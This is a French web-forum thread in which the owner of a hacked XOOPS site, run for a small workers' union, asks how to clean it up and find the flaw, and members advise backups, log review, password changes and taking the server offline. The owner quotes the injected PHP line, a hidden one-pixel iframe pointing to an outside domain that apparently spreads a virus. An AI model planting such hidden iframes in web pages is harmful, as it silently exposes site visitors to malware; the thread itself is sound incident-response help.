Mon site est hackés

Fermé
newweek - 28 mai 2009 à 22:36
Le-Vengeur-Masqué Messages postés 142 Date d'inscription mardi 19 mai 2009 Statut Membre Dernière intervention 8 octobre 2010 - 29 mai 2009 à 15:12
Bonjour,

Mon site www.fdt-sdp.com relaisé par xoops 3.2.1 (traduction arabe) à été hacké …les malfaiteurs ont ajouter une iframe dans chaque fichier index.php du site (noyau et module) ..
Comment je dois faire maintenant pour :
Nettoyer mon site
Trouver la faille et la corriger
Faire une sécurité renfoncée de mon site
A voir également:

6 réponses

Le-Vengeur-Masqué Messages postés 142 Date d'inscription mardi 19 mai 2009 Statut Membre Dernière intervention 8 octobre 2010 3
28 mai 2009 à 22:41
Bonjour, il a été hacké par qui ? ou quelle team ?
0
je ne sais pas qui , mais il sont injecter cette iframe dans mes index
echo "<iframe src=\"http://internetcountercheck.com/?click=85262671\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
0
kryoportail Messages postés 222 Date d'inscription dimanche 10 août 2008 Statut Membre Dernière intervention 22 mai 2014 125
28 mai 2009 à 23:26
Salut,

L'important est pas qui mais comment...
Dire qui s'est leur fera de la pub... et ils seront encore plus fier de leur bêtise....

1. Je sauverais ma base de données maintenant !
2. Je tenterais de comprendre comment ils ont fait, je chercherais vers une XSS : https://fr.wikipedia.org/wiki/Cross-site_scripting, regarde les logs de ton serveur....
3. Tu retires la faille qui leur on permit de modifier le code de tes pages... Change tes mots de passe d'administration...
4. Tu retires le code malicieux inséré dans tes pages....

Bon courage... je n'aimerais pas être à ta place....

Amicalement,
S@M...
0
merci cher ami
le maleur que c'est un site d'une syndicat des petits ouvriers ........
ce n'nest ni commercial ni ......
0
comment je px connaitre la faille sachons que j'est pas encore etudier le code de xoops ni des ses modules
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
kryoportail Messages postés 222 Date d'inscription dimanche 10 août 2008 Statut Membre Dernière intervention 22 mai 2014 125
28 mai 2009 à 23:45
Re,

As tu sauvé tes fichiers, et ta base de données...

Je te conseillerai presque d'arrêter ton serveur ou de le rendre inaccessible le temps que tu répares... car apparemment la iframe diffuse un virus....

Amicalement
S@M...
0
Le-Vengeur-Masqué Messages postés 142 Date d'inscription mardi 19 mai 2009 Statut Membre Dernière intervention 8 octobre 2010 3
29 mai 2009 à 15:12
Ma question n'était pas innocente, en sachant par qui on peut trouver comment et c'est du vécu.
0